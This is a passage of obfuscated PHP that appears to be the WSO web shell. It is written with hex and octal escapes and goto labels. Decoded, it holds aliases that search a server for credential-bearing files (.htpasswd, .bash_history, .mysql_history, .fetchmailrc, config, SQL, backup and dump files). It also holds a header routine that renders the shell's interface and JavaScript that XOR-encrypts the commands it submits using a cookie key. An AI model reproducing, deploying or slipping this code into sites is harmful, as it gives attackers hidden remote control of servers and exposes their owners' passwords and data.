"\x6c\157\x63\x61\x74\145\x20\x63\x6f\x6e\146\x69\147\56\x69\156\x63", "\154\x6f\143\141\x74\x65\40\143\x6f\x6e\x66\151\147\56\x69\156\143\x2e\x70\x68\x70" => "\x6c\x6f\x63\x61\x74\x65\x20\x63\x6f\156\x66\151\x67\x2e\x69\156\x63\56\x70\150\x70", "\154\157\143\141\x74\x65\x20\143\157\x6e\x66\x69\x67\56\144\x65\146\141\165\154\164\56\x70\x68\x70\40\x66\x69\x6c\145\x73" => "\154\157\x63\141\x74\x65\x20\x63\x6f\156\x66\151\147\x2e\144\145\146\x61\165\154\164\56\160\150\160", "\154\157\x63\141\x74\x65\x20\143\157\x6e\146\151\x67\x2a\40\x66\151\154\145\x73\40" => "\154\x6f\x63\141\x74\145\x20\143\157\156\x66\x69\147", "\154\157\143\141\x74\x65\x20\56\143\x6f\156\146\40\x66\x69\154\x65\x73" => "\x6c\157\143\x61\x74\145\x20\47\x2e\143\157\x6e\146\47", "\x6c\157\x63\141\164\x65\40\56\160\167\x64\x20\146\151\154\145\163" => "\154\x6f\x63\141\164\145\x20\x27\56\160\x77\x64\x27", "\x6c\x6f\143\141\164\x65\40\56\x73\x71\x6c\40\146\x69\154\145\x73" => "\x6c\x6f\x63\141\164\x65\40\47\x2e\163\161\x6c\47", "\154\x6f\x63\141\x74\x65\40\56\150\x74\160\141\x73\163\167\x64\x20\x66\151\154\x65\163" => "\154\x6f\143\x61\164\x65\x20\x27\x2e\x68\x74\x70\x61\x73\163\x77\x64\47", "\154\157\143\141\x74\x65\40\x2e\x62\x61\163\150\x5f\150\151\163\164\x6f\162\171\40\146\x69\x6c\x65\163" => "\x6c\157\143\x61\x74\145\x20\47\x2e\142\x61\x73\150\137\x68\x69\x73\x74\157\162\171\47", "\154\x6f\x63\x61\164\x65\40\56\155\x79\x73\x71\x6c\x5f\150\x69\x73\164\x6f\162\171\x20\146\x69\x6c\145\x73" => "\154\x6f\x63\x61\164\x65\x20\x27\x2e\x6d\171\x73\x71\x6c\137\x68\151\163\164\x6f\162\171\47", "\x6c\x6f\x63\141\164\145\x20\56\146\x65\x74\143\150\155\x61\151\154\x72\x63\40\x66\151\x6c\x65\163" => "\154\x6f\x63\141\164\145\40\47\56\146\x65\x74\143\150\155\x61\x69\x6c\x72\x63\x27", "\154\157\143\141\164\145\x20\142\141\143\153\165\x70\x20\x66\151\154\145\163" => "\x6c\x6f\x63\141\164\x65\40\x62\x61\x63\153\x75\x70", "\x6c\157\143\x61\164\x65\x20\144\165\155\x70\40\146\151\x6c\x65\x73" => "\154\157\x63\141\x74\145\x20\x64\165\x6d\160", "\x6c\157\x63\x61\164\145\x20\160\x72\151\166\40\x66\x69\154\x65\x73" => "\154\x6f\143\141\x74\145\x20\x70\x72\151\166"); } goto Oda8Q; oh1bD: function hardHeader() { if (empty($_POST["\x63\x68\141\x72\163\x65\x74"])) { $_POST["\x63\150\x61\162\163\x65\x74"] = $GLOBALS["\xe2\226\x9c"]; } echo "\x3c\x68\x74\x6d\154\76\x3c\x68\x65\x61\x64\76\74\155\x65\x74\141\x20\150\x74\x74\x70\55\x65\161\x75\x69\x76\x3d\47\103\157\x6e\x74\145\x6e\x74\55\124\x79\x70\145\x27\40\x63\157\156\x74\x65\x6e\164\75\x27\164\x65\x78\164\x2f\x68\x74\155\154\73\40\x63\150\141\x72\163\145\164\75" . $_POST["\x63\x68\141\162\163\x65\164"] . "\47\76\x3c\x74\x69\x74\154\145\76" . $_SERVER["\110\124\x54\120\137\x48\x4f\x53\x54"] . "\40\55\x20\x57\123\117\40" . VERSION . "\x3c\57\164\151\x74\154\145\76\12\40\x20\x20\40\74\154\151\x6e\x6b\40\x68\x72\145\146\x3d\x27\x68\x74\x74\160\x73\x3a\57\x2f\146\157\x6e\164\x73\x2e\147\157\x6f\147\154\x65\141\160\x69\x73\x2e\143\x6f\x6d\57\x63\x73\x73\x3f\146\x61\155\x69\154\171\75\116\x75\x6e\x69\164\157\47\40\x72\145\x6c\x3d\x27\x73\x74\171\154\145\163\x68\x65\145\x74\47\x3e\12\40\x20\x20\x20\74\154\151\x6e\153\x20\x72\x65\154\x3d\x27\x73\164\x79\x6c\x65\163\x68\x65\x65\164\x27\40\x68\162\145\146\75\x27\150\164\x74\160\x73\x3a\x2f\57\x63\x64\156\x2e\x72\x61\167\147\x69\164\56\x63\x6f\155\x2f\153\x69\155\145\151\x67\141\x2f\x62\141\150\x75\156\x79\x61\57\x63\x73\163\x2f\x62\141\150\x75\156\x79\141\x2d\x30\x2e\x31\x2e\63\x2e\143\163\x73\x27\76\xa\74\163\x74\x79\x6c\x65\76\12\x9\x62\157\144\171\40\x7b\142\141\x63\153\147\162\157\x75\x6e\144\55\x63\x6f\x6c\157\x72\72\43\60\66\x30\101\61\60\73\x20\x63\157\x6c\x6f\162\72\43\145\x31\145\x31\145\x31\73\40\155\141\162\x67\x69\x6e\72\x30\73\40\146\157\x6e\x74\x3a\x6e\x6f\162\155\141\x6c\x20\x37\x35\45\40\101\162\151\141\x6c\x2c\x20\110\145\154\x76\145\164\x69\143\x61\54\x20\x73\x61\156\x73\55\x73\x65\162\151\x66\73\x20\x7d\40\143\x61\156\166\x61\163\173\40\144\151\x73\x70\154\141\171\x3a\40\x62\154\x6f\143\153\73\x20\166\x65\x72\164\x69\x63\x61\x6c\x2d\x61\154\x69\147\x6e\72\x20\142\157\164\164\157\155\73\175\xa\11\43\x70\x61\x72\x74\151\x63\x6c\x65\x73\x2d\152\x73\173\x77\151\x64\x74\x68\72\x20\x31\60\60\x25\x3b\x20\x68\145\151\147\x68\x74\72\40\x31\x30\x30\x70\x78\73\x20\x62\141\x63\x6b\147\162\157\x75\x6e\x64\55\143\x6f\x6c\x6f\x72\72\x20\x23\60\66\x30\x61\61\60\x3b\x20\x62\141\143\x6b\x67\x72\x6f\165\x6e\x64\55\x69\155\x61\147\145\x3a\x20\x75\162\x6c\50\x27\47\51\73\40\x62\x61\x63\153\147\162\x6f\x75\156\x64\55\162\x65\160\145\141\164\x3a\40\x6e\157\55\x72\x65\160\x65\x61\x74\x3b\x20\142\141\x63\x6b\x67\x72\x6f\x75\156\x64\55\163\151\x7a\x65\x3a\40\143\x6f\x76\x65\x72\x3b\40\142\141\143\x6b\147\x72\157\x75\x6e\144\55\x70\x6f\x73\x69\x74\151\157\x6e\72\40\65\60\45\x20\65\x30\45\73\175\xa\x9\x62\x6f\x64\x79\x2c\x74\144\54\x74\x68\x9\173\146\x6f\156\164\72\x31\x30\x70\164\40\x74\141\150\x6f\155\141\54\x61\x72\x69\141\x6c\x2c\166\145\x72\x64\141\x6e\x61\x2c\163\x61\x6e\163\x2d\163\x65\x72\x69\146\x2c\114\165\143\x69\144\x61\x20\x53\141\156\163\73\155\x61\x72\x67\151\156\x3a\x30\x3b\166\x65\162\x74\x69\x63\141\x6c\x2d\x61\x6c\151\147\x6e\x3a\164\157\160\x3b\x7d\12\x9\x74\141\x62\x6c\145\x2e\x69\156\146\157\11\173\x63\x6f\x6c\x6f\x72\72\43\x43\x33\x43\x33\103\x33\73\x7d\12\11\x74\141\142\x6c\145\x23\164\157\x6f\x6c\163\124\142\x6c\x20\x7b\142\x61\x63\x6b\147\162\x6f\165\x6e\x64\x2d\143\x6f\154\x6f\162\72\40\x23\60\x36\x30\101\x31\60\73\175\12\x9\163\x70\141\x6e\x2c\x68\x31\54\x61\x9\x7b\x63\x6f\154\157\162\72\43\x36\x38\x62\67\62\x33\x20\41\x69\x6d\x70\x6f\162\x74\x61\156\x74\73\x7d\xa\x9\x73\160\141\x6e\x9\11\x7b\x66\x6f\x6e\x74\55\167\x65\x69\x67\150\x74\72\142\x6f\154\144\x65\162\73\175\xa\11\150\x31\11\x9\x9\x7b\x62\157\162\x64\145\x72\x2d\x6c\145\x66\x74\x3a\65\x70\170\40\x73\157\x6c\x69\144\x20\x23\141\61\60\x37\x30\65\x3b\160\x61\x64\x64\151\156\147\x3a\62\x70\170\40\x35\x70\x78\x3b\146\x6f\x6e\164\x3a\61\x34\160\x74\40\126\145\162\144\x61\x6e\141\x3b\x62\141\143\x6b\147\x72\157\165\156\x64\x2d\143\x6f\x6c\x6f\162\x3a\43\61\60\61\65\x31\x63\73\155\x61\162\147\151\x6e\x3a\60\x70\170\x3b\x7d\xa\11\144\x69\x76\56\x63\x6f\156\x74\x65\x6e\x74\11\173\x70\x61\x64\144\x69\156\147\x3a\65\x70\170\x3b\155\x61\x72\x67\x69\156\55\154\145\x66\164\x3a\x35\160\x78\x3b\x62\141\x63\153\147\x72\x6f\x75\156\x64\55\x63\x6f\x6c\157\x72\x3a\43\60\66\x30\x61\x31\60\73\x7d\xa\x9\141\11\x9\11\x7b\164\145\170\164\55\x64\x65\143\157\x72\141\164\x69\157\156\72\156\157\156\145\x3b\175\12\11\x61\72\x68\x6f\166\145\162\x9\11\173\x74\145\x78\164\55\144\145\x63\157\162\141\164\151\x6f\156\72\x75\x6e\x64\x65\162\154\x69\156\x65\73\175\12\x9\56\x74\157\157\x6c\164\x69\x70\x3a\x3a\x61\146\x74\145\162\40\x7b\142\x61\x63\153\147\162\157\x75\x6e\144\x3a\43\60\66\x36\63\x44\x35\x3b\x63\157\x6c\x6f\x72\x3a\43\x46\x46\106\73\x63\x6f\156\164\x65\x6e\164\72\40\141\x74\x74\162\x28\x64\x61\x74\141\x2d\x74\157\x6f\x6c\164\151\160\51\x3b\x6d\141\x72\147\151\x6e\55\164\x6f\160\x3a\x2d\65\60\160\x78\x3b\x64\x69\163\160\x6c\141\x79\72\x62\154\x6f\x63\x6b\73\x70\141\x64\x64\151\x6e\x67\x3a\66\x70\x78\x20\61\60\x70\x78\73\x70\x6f\x73\x69\x74\151\157\156\72\141\142\163\x6f\x6c\165\164\145\73\166\x69\x73\x69\x62\x69\x6c\x69\164\171\72\x68\x69\x64\144\x65\x6e\x3b\x7d\12\11\x2e\x74\157\157\154\164\151\x70\x3a\x68\157\166\145\162\72\72\x61\146\x74\145\x72\x20\173\x6f\160\141\x63\151\x74\x79\x3a\61\x3b\166\151\x73\x69\x62\x69\154\x69\164\x79\72\x76\151\x73\x69\x62\154\x65\73\175\xa\11\x2e\155\x6c\61\x9\11\173\142\x6f\x72\x64\x65\162\72\61\x70\170\40\x73\x6f\154\x69\144\x20\43\62\x30\x32\70\63\x32\x3b\x70\x61\x64\144\x69\156\x67\72\65\x70\170\x3b\155\x61\162\147\x69\156\x3a\60\73\x6f\x76\145\x72\x66\154\157\x77\72\141\x75\164\x6f\73\x7d\xa\11\x2e\x62\151\x67\141\x72\x65\141\11\x7b\155\151\156\x2d\167\x69\144\x74\150\72\61\x30\x30\45\x3b\155\x61\x78\x2d\167\151\x64\x74\150\72\61\x30\60\x25\73\150\x65\x69\x67\150\x74\x3a\64\x30\60\160\170\x3b\x7d\12\11\x69\x6e\160\x75\x74\x2c\x20\x74\x65\170\x74\x61\x72\x65\141\x2c\x20\x73\x65\154\145\143\164\11\x7b\155\x61\x72\147\x69\x6e\x3a\x30\x3b\x63\x6f\x6c\x6f\162\72\43\146\x66\146\x3b\142\x61\x63\153\x67\x72\157\x75\156\x64\55\143\x6f\x6c\x6f\x72\72\x23\x32\60\x32\70\x33\x32\73\x62\157\x72\144\145\162\x3a\x6e\157\x6e\145\73\146\x6f\x6e\164\72\71\160\x74\40\x43\157\165\x72\151\x65\162\40\x4e\x65\167\73\157\165\164\x6c\x69\x6e\145\x3a\x6e\x6f\156\145\x3b\175\xa\11\154\x61\142\145\x6c\x20\173\160\x6f\x73\151\x74\151\x6f\156\72\x72\x65\x6c\x61\x74\151\x76\145\x7d\12\x9\154\141\x62\145\154\72\x61\x66\x74\145\x72\173\x62\x6f\x72\x64\x65\162\x2d\142\157\x74\164\x6f\155\72\62\160\170\x20\x73\x6f\x6c\151\144\x20\43\71\x39\x39\73\x62\x6f\x72\x64\145\162\55\162\x69\x67\x68\164\x3a\62\x70\x78\x20\163\157\x6c\x69\x64\40\43\71\x39\x39\73\143\x6f\156\164\x65\156\164\x3a\x27\47\x3b\144\151\x73\x70\x6c\141\x79\x3a\x62\154\157\143\x6b\73\x68\145\x69\x67\x68\x74\x3a\65\x70\x78\73\x6d\x61\x72\147\151\x6e\55\164\157\x70\x3a\55\64\160\x78\73\x70\x6f\151\156\164\145\162\x2d\x65\166\x65\156\x74\x73\72\x6e\x6f\156\145\73\160\x6f\163\151\x74\151\x6f\x6e\72\141\x62\x73\157\x6c\x75\164\x65\73\162\x69\x67\150\164\x3a\61\62\x70\x78\73\164\x6f\x70\72\65\x30\45\x3b\x2d\x77\145\x62\x6b\x69\164\x2d\x74\x72\x61\156\163\x66\x6f\162\x6d\55\157\162\x69\147\x69\156\72\66\x36\x25\40\x36\66\45\73\55\155\163\x2d\x74\162\x61\156\x73\x66\x6f\x72\155\x2d\157\162\x69\147\151\156\x3a\66\66\45\x20\x36\x36\x25\x3b\164\162\141\x6e\163\x66\157\162\155\55\x6f\162\x69\x67\151\x6e\x3a\66\x36\x25\40\x36\66\45\73\x2d\167\145\142\153\151\164\55\164\x72\141\x6e\x73\146\x6f\162\x6d\x3a\162\157\164\141\x74\x65\x28\x34\x35\144\145\x67\51\73\x2d\x6d\x73\55\164\x72\x61\x6e\163\x66\157\162\155\x3a\x72\x6f\x74\x61\x74\x65\x28\64\65\x64\145\x67\51\x3b\x74\162\141\x6e\x73\146\x6f\162\155\72\x72\x6f\x74\x61\x74\x65\50\64\65\144\145\147\51\x3b\x2d\x77\145\x62\x6b\151\164\55\x74\162\x61\x6e\x73\151\164\x69\157\156\72\x61\x6c\x6c\x20\56\61\65\x73\x20\x65\141\x73\145\x2d\x69\156\x2d\157\x75\164\x3b\164\x72\x61\x6e\x73\x69\x74\x69\157\156\72\141\x6c\154\x20\x2e\x31\65\163\x20\x65\141\163\x65\55\151\156\55\157\x75\x74\73\x77\x69\x64\x74\x68\x3a\65\x70\170\175\xa\x9\154\141\x62\145\x6c\x3a\x62\145\146\157\162\145\x20\x7b\143\157\x6e\x74\145\x6e\x74\72\x27\47\x3b\x72\x69\x67\x68\164\72\x30\x3b\x20\x74\157\160\x3a\x30\x3b\x77\x69\144\x74\150\x3a\61\67\x70\170\73\x20\x68\x65\x69\x67\x68\164\x3a\61\x37\160\x78\x3b\142\141\x63\x6b\147\x72\x6f\x75\156\x64\72\x23\x32\x30\62\70\x33\62\x3b\160\157\x73\x69\164\151\x6f\x6e\x3a\x61\x62\163\x6f\x6c\x75\x74\x65\73\160\x6f\151\156\164\145\162\x2d\145\166\145\x6e\x74\x73\72\x6e\157\x6e\145\x3b\x64\151\163\x70\x6c\x61\x79\x3a\x62\x6c\157\143\153\73\175\12\11\146\x6f\162\155\11\11\x7b\x6d\x61\x72\147\x69\156\72\x30\x70\170\x3b\x7d\xa\11\43\164\x6f\x6f\x6c\163\x54\x62\x6c\x9\173\x74\x65\x78\x74\55\x61\154\x69\147\x6e\72\x63\x65\x6e\164\x65\x72\73\x7d\xa\x9\x23\x66\141\x6b\x20\11\x9\x7b\142\x61\143\153\147\162\x6f\165\156\x64\x3a\x6e\x6f\156\145\x3b\175\12\11\x23\146\x61\x6b\40\x74\144\40\11\x7b\160\141\144\144\151\x6e\x67\x3a\65\160\x78\x20\x30\x20\x30\x20\x30\73\175\xa\x9\151\x66\162\x61\x6d\145\x9\x9\173\142\x6f\x72\x64\x65\x72\72\61\x70\x78\40\x73\x6f\x6c\x69\x64\40\43\x30\66\60\141\61\60\x3b\x7d\xa\11\x2e\x74\157\157\x6c\163\111\156\x70\x9\173\x77\x69\x64\x74\x68\x3a\63\60\x30\x70\x78\175\12\x9\56\155\141\x69\x6e\40\x74\150\x9\173\164\145\x78\164\x2d\x61\154\x69\147\x6e\72\154\x65\x66\164\73\x62\141\143\153\147\162\157\x75\156\144\55\143\157\x6c\157\x72\72\43\60\66\60\x61\x31\60\73\175\12\11\56\x6d\x61\151\x6e\40\x74\162\72\x68\157\166\145\162\173\142\x61\143\x6b\x67\x72\x6f\165\156\144\55\x63\x6f\x6c\157\x72\72\x23\x33\65\x34\x32\x35\62\73\x7d\12\11\56\155\141\151\156\40\x74\144\x2c\x20\x74\x68\x7b\166\x65\162\x74\151\143\x61\154\x2d\141\154\x69\147\x6e\x3a\155\x69\144\x64\x6c\145\73\x7d\xa\x9\151\156\160\x75\164\x5b\164\171\x70\145\x3d\x27\x73\165\x62\x6d\x69\x74\x27\x5d\x7b\x62\141\143\x6b\147\x72\157\165\156\x64\55\x63\x6f\x6c\157\162\72\43\60\x64\65\62\x62\x66\x3b\x20\143\157\154\157\x72\x3a\x23\x66\x61\x66\x61\x66\x61\x3b\x7d\xa\11\x69\x6e\x70\165\x74\133\x74\171\160\x65\75\47\x62\x75\164\164\157\156\47\x5d\x7b\142\141\143\x6b\x67\x72\157\165\156\144\x2d\143\x6f\154\x6f\x72\x3a\43\x30\x64\x35\x32\142\x66\x3b\40\x63\x6f\x6c\157\x72\x3a\43\146\x61\x66\141\x66\141\x3b\175\12\11\x69\x6e\160\x75\x74\x5b\x74\x79\160\145\75\x27\x73\165\x62\x6d\x69\x74\x27\x5d\x3a\150\157\166\x65\x72\x7b\x62\141\x63\x6b\x67\x72\157\165\x6e\144\55\x63\x6f\154\157\162\72\x23\60\60\x32\145\x39\x39\x3b\x20\x63\x6f\154\x6f\x72\x3a\x23\x66\x61\x66\x61\x66\x61\x3b\175\12\11\x69\156\x70\165\164\133\x74\x79\x70\x65\75\47\142\x75\164\164\x6f\156\47\135\72\150\157\x76\x65\162\x7b\142\141\x63\153\147\x72\x6f\165\x6e\x64\x2d\x63\157\154\x6f\x72\x3a\43\60\60\x32\x65\71\71\73\40\x63\157\x6c\x6f\x72\x3a\x23\146\x61\146\x61\146\x61\x3b\175\xa\11\x2e\154\61\11\x9\11\x7b\142\x61\143\x6b\147\162\157\x75\x6e\x64\55\x63\x6f\154\157\162\x3a\43\62\x30\62\70\63\x32\73\x7d\xa\x9\160\x72\x65\11\x9\x9\173\146\157\x6e\x74\72\x39\x70\164\x20\103\157\x75\162\x69\145\162\x20\116\145\x77\73\x7d\xa\x3c\57\163\x74\171\x6c\x65\76\xa\x3c\x73\x63\162\151\x70\164\x3e\xa\40\40\x20\40\x76\141\162\40\x63\137\x20\x3d\40\47" . htmlspecialchars($GLOBALS["\143\167\x64"]) . "\47\x3b\12\x20\40\40\x20\166\x61\x72\40\141\x5f\x20\x3d\x20\47" . htmlspecialchars(@$_POST["\x61"]) . "\47\12\x20\40\x20\40\x76\141\x72\40\x63\x68\x61\x72\x73\145\164\x5f\x20\75\40\47" . htmlspecialchars(@$_POST["\x63\x68\x61\162\163\145\x74"]) . "\x27\x3b\12\x20\x20\40\40\166\x61\162\40\x70\61\137\40\x3d\x20\x27" . (strpos(@$_POST["\x70\61"], "\xa") !== false ? '' : htmlspecialchars($_POST["\x70\x31"], ENT_QUOTES)) . "\47\73\xa\x20\40\40\40\166\x61\162\40\x70\x32\x5f\40\75\x20\x27" . (strpos(@$_POST["\160\62"], "\xa") !== false ? '' : htmlspecialchars($_POST["\160\62"], ENT_QUOTES)) . "\47\x3b\xa\40\40\x20\40\x76\x61\162\x20\160\63\x5f\x20\75\40\47" . (strpos(@$_POST["\x70\63"], "\xa") !== false ? '' : htmlspecialchars($_POST["\160\63"], ENT_QUOTES)) . "\47\73\xa\x20\40\x20\40\166\x61\162\40\144\40\75\x20\144\157\143\165\155\145\x6e\164\x3b\12\x9\146\x75\156\x63\164\151\x6f\x6e\40\x65\156\x63\x72\171\x70\164\x28\163\164\x72\x2c\160\167\x64\51\173\x69\146\x28\x70\167\144\x3d\75\156\165\x6c\x6c\x7c\174\160\167\144\56\154\145\156\147\x74\x68\x3c\75\60\x29\x7b\162\x65\164\165\162\x6e\x20\x6e\x75\154\154\73\x7d\163\164\162\x3d\x62\x61\163\x65\x36\x34\x5f\145\x6e\x63\157\x64\x65\50\163\x74\x72\51\x3b\x70\x77\144\75\142\x61\163\145\x36\x34\137\145\156\x63\x6f\144\x65\x28\160\167\144\x29\x3b\x76\x61\162\x20\145\156\143\x5f\x63\x68\x72\x3d\x27\47\x3b\166\141\x72\40\145\x6e\143\x5f\163\x74\162\75\47\47\x3b\x76\141\x72\40\151\x3d\x30\73\x77\150\151\154\x65\50\x69\x3c\x73\164\x72\56\154\145\156\x67\164\150\x29\173\x66\157\162\50\x76\x61\x72\x20\x6a\75\60\73\152\74\160\x77\144\x2e\154\145\x6e\147\x74\150\x3b\152\53\x2b\x29\x7b\145\156\143\x5f\143\x68\162\x3d\x73\x74\162\x2e\143\x68\141\x72\103\157\144\145\x41\164\x28\151\x29\136\x70\x77\x64\x2e\x63\x68\141\x72\x43\x6f\x64\145\101\164\x28\152\x29\x3b\145\x6e\143\137\x73\x74\x72\x2b\75\x53\x74\162\151\x6e\147\56\x66\162\x6f\155\x43\x68\x61\162\x43\157\x64\x65\x28\145\156\143\137\x63\x68\x72\x29\73\x69\x2b\x2b\73\151\146\50\151\x3e\x3d\x73\164\162\x2e\154\145\x6e\x67\x74\x68\x29\142\x72\145\141\x6b\73\x7d\x7d\162\145\164\165\x72\x6e\40\142\x61\x73\145\x36\x34\x5f\145\x6e\x63\157\x64\145\x28\x65\156\x63\137\x73\x74\x72\51\73\175\12\x9\146\x75\156\143\164\151\157\x6e\x20\165\164\146\x38\137\145\156\x63\157\x64\x65\50\x61\162\147\x53\164\x72\151\x6e\x67\x29\173\166\141\x72\x20\163\164\x72\x69\156\147\75\x28\141\162\x67\123\164\x72\151\x6e\x67\x2b\47\x27\51\x3b\166\141\162\x20\165\x74\146\x74\x65\170\x74\75\47\47\54\x73\x74\141\x72\x74\54\x65\x6e\x64\x2c\163\x74\162\x69\156\147\x6c\x3d\60\x3b\x73\x74\x61\162\x74\75\x65\x6e\144\x3d\60\73\163\164\x72\x69\x6e\147\154\75\163\x74\x72\x69\156\147\56\x6c\x65\156\147\164\x68\x3b\146\157\162\50\x76\x61\162\40\156\75\60\73\x6e\x3c\x73\164\x72\151\x6e\147\154\x3b\x6e\53\x2b\51\x7b\x76\x61\162\x20\x63\x31\75\163\x74\162\x69\x6e\147\x2e\143\x68\141\162\x43\x6f\144\x65\101\x74\x28\156\51\73\x76\x61\162\40\145\x6e\x63\75\x6e\165\154\154\73\151\x66\50\143\61\74\x31\62\x38\51\173\145\x6e\144\x2b\x2b\73\x7d\145\x6c\x73\145\40\151\x66\50\x63\x31\76\61\62\x37\46\46\x63\61\x3c\x32\60\x34\70\x29\x7b\x65\156\x63\x3d\x53\164\162\151\156\x67\x2e\x66\x72\x6f\x6d\x43\150\141\162\x43\157\144\x65\50\50\x63\61\x3e\76\66\51\x7c\x31\71\62\51\x2b\x53\x74\x72\151\156\147\56\x66\x72\x6f\155\103\x68\141\162\103\157\x64\145\x28\50\x63\61\x26\x36\x33\x29\174\x31\62\x38\51\73\175\145\154\163\145\x7b\x65\x6e\143\75\x53\x74\x72\151\156\x67\56\146\162\x6f\155\x43\150\x61\162\x43\157\x64\145\x28\x28\x63\x31\x3e\76\61\62\x29\174\x32\62\64\x29\53\123\164\x72\x69\156\x67\56\146\x72\157\155\103\x68\141\162\103\x6f\x64\145\50\50\x28\x63\61\76\x3e\66\x29\x26\x36\x33\51\174\61\x32\70\51\53\123\x74\x72\x69\x6e\147\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\50\50\143\61\x26\66\x33\51\174\x31\x32\70\x29\73\175\x69\x66\x28\145\156\143\41\x3d\x3d\156\165\154\154\x29\x7b\151\146\x28\x65\156\x64\x3e\163\x74\141\x72\164\51\173\x75\164\146\164\145\170\164\x2b\75\x73\164\x72\151\156\x67\x2e\163\154\151\x63\x65\50\x73\x74\141\162\x74\x2c\x65\x6e\x64\51\73\x7d\x75\x74\146\x74\x65\170\x74\53\x3d\x65\156\x63\x3b\x73\164\x61\162\164\75\x65\x6e\x64\x3d\x6e\53\61\73\175\175\x69\x66\50\145\x6e\144\76\x73\x74\141\162\164\51\x7b\x75\164\x66\x74\x65\x78\164\x2b\75\163\x74\162\151\156\147\56\163\x6c\151\143\x65\50\x73\164\x61\162\164\54\163\x74\162\x69\156\147\x6c\51\73\x7d\x72\x65\164\165\x72\156\x20\x75\164\x66\x74\x65\170\164\73\175\xa\x9\146\x75\x6e\x63\164\x69\x6f\156\40\142\x61\163\145\x36\64\x5f\145\x6e\143\x6f\x64\x65\50\144\x61\164\x61\x29\173\x76\141\162\40\x62\x36\x34\40\x3d\x20\47\x41\x42\x43\104\105\x46\107\110\x49\x4a\x4b\114\x4d\116\117\120\x51\122\x53\x54\125\126\127\130\131\132\141\x62\x63\144\x65\146\147\150\x69\x6a\x6b\x6c\155\156\x6f\160\161\x72\163\164\x75\166\167\x78\x79\172\x30\61\62\63\x34\65\x36\67\70\71\x2b\x2f\x3d\x27\73\x76\141\x72\x20\x6f\61\x2c\x6f\62\x2c\157\x33\x2c\x68\61\54\150\62\x2c\x68\63\54\150\x34\x2c\x62\x69\164\163\x2c\151\x3d\x30\x2c\141\143\x3d\60\x2c\x65\x6e\143\x3d\x27\47\54\164\155\160\x5f\x61\162\162\x3d\x5b\135\73\151\146\40\x28\41\144\x61\x74\x61\x29\x7b\162\145\x74\165\162\x6e\40\144\x61\x74\141\73\175\x64\141\x74\x61\x3d\x75\164\146\70\137\145\156\x63\157\x64\145\50\144\141\164\x61\53\x27\x27\51\73\x64\157\173\157\61\75\144\141\x74\x61\x2e\143\150\x61\x72\x43\157\144\145\x41\x74\50\x69\53\x2b\x29\73\157\x32\75\144\x61\x74\x61\56\143\x68\141\162\x43\157\x64\145\x41\164\x28\x69\53\53\x29\x3b\157\x33\x3d\144\141\x74\141\x2e\x63\x68\x61\x72\x43\157\144\145\x41\x74\x28\x69\53\53\x29\x3b\x62\151\x74\163\75\157\61\x3c\x3c\61\x36\174\157\62\74\74\x38\x7c\x6f\63\x3b\x68\61\75\x62\151\x74\x73\76\76\61\70\x26\x30\x78\63\146\x3b\x68\62\x3d\x62\x69\x74\163\76\x3e\61\62\x26\60\x78\63\x66\73\150\63\x3d\x62\151\x74\163\76\x3e\x36\x26\60\x78\x33\146\x3b\x68\x34\x3d\142\151\x74\163\46\x30\x78\63\146\73\x74\x6d\160\x5f\x61\162\x72\x5b\141\143\53\53\x5d\75\142\x36\x34\x2e\143\150\141\x72\x41\164\x28\150\x31\x29\53\x62\x36\x34\x2e\x63\x68\141\162\x41\164\x28\150\62\x29\53\142\66\x34\56\x63\x68\x61\162\101\x74\x28\150\x33\x29\x2b\142\66\64\56\x63\150\x61\162\x41\164\x28\x68\x34\51\73\x7d\167\150\x69\154\145\50\x69\x3c\x64\x61\x74\141\x2e\154\x65\x6e\x67\164\x68\51\x3b\145\156\143\x3d\x74\x6d\x70\x5f\141\x72\x72\x2e\x6a\157\x69\156\50\47\x27\51\x3b\163\167\151\x74\143\x68\x20\x28\x64\x61\x74\x61\56\x6c\145\x6e\147\x74\150\x25\63\51\x7b\x63\141\x73\145\40\x31\72\x65\156\143\x3d\x65\156\x63\x2e\x73\x6c\151\x63\145\x28\60\54\x2d\x32\x29\53\x27\75\x3d\47\x3b\x62\x72\145\141\x6b\x3b\143\x61\163\x65\x20\62\72\x65\x6e\143\x3d\145\156\x63\56\x73\x6c\151\x63\145\x28\x30\54\55\x31\51\53\47\75\x27\x3b\142\x72\x65\x61\x6b\x3b\175\x72\145\x74\x75\162\x6e\40\x65\x6e\143\73\x7d\xa\11\x66\165\x6e\x63\x74\151\x6f\x6e\40\163\145\x74\x28\141\x2c\143\x2c\x70\61\54\x70\62\54\160\x33\x2c\143\x68\x61\x72\163\145\x74\51\40\x7b\12\11\x9\151\146\50\x61\41\75\156\165\x6c\x6c\x29\144\x2e\x6d\x66\x2e\x61\x2e\166\x61\x6c\x75\x65\x3d\141\x3b\x65\x6c\x73\145\40\144\x2e\x6d\x66\x2e\x61\x2e\x76\x61\154\165\145\75\141\x5f\x3b\xa\11\11\x69\x66\x28\x63\x21\75\156\165\154\x6c\51\x64\56\x6d\x66\56\x63\x2e\x76\x61\x6c\x75\145\x3d\x63\73\x65\154\163\x65\40\144\x2e\x6d\x66\x2e\x63\56\166\x61\154\165\145\x3d\x63\137\x3b\xa\x9\11\x69\146\x28\x70\61\41\75\x6e\x75\154\154\51\144\56\155\x66\x2e\160\x31\x2e\x76\x61\x6c\165\x65\75\x70\61\x3b\145\154\x73\145\x20\x64\56\x6d\x66\x2e\160\x31\56\166\141\x6c\165\x65\75\160\x31\x5f\73\12\x9\x9\x69\146\x28\x70\x32\x21\75\156\165\x6c\x6c\51\144\56\155\x66\x2e\160\x32\56\x76\x61\154\165\145\x3d\x70\62\73\x65\x6c\x73\x65\x20\144\x2e\x6d\x66\x2e\x70\62\x2e\x76\141\154\x75\x65\75\160\x32\137\73\12\x9\x9\x69\x66\50\160\63\41\x3d\156\165\154\154\x29\x64\x2e\155\x66\56\x70\x33\56\166\141\x6c\165\145\x3d\160\63\73\145\154\x73\145\x20\144\x2e\x6d\x66\56\x70\x33\56\166\141\154\165\145\x3d\160\x33\137\x3b\xa\x9\11\x64\56\x6d\146\x2e\x61\56\x76\141\154\165\145\x20\x3d\x20\145\x6e\143\x72\x79\x70\164\x28\x64\56\155\x66\x2e\x61\x2e\166\141\154\165\145\54\x27" . $_COOKIE[md5($_SERVER["\110\x54\124\x50\x5f\x48\x4f\123\x54"]) . "\x6b\x65\x79"] . "\47\51\73\xa\x9\x9\x64\56\155\x66\x2e\143\x2e\x76\x61\154\x75\145\40\x3d\40\145\156\x63\162\171\x70\x74\x28\144\x2e\x6d\146\x2e\x63\56\x76\x61\x6c\165\145\x2c\x27" . 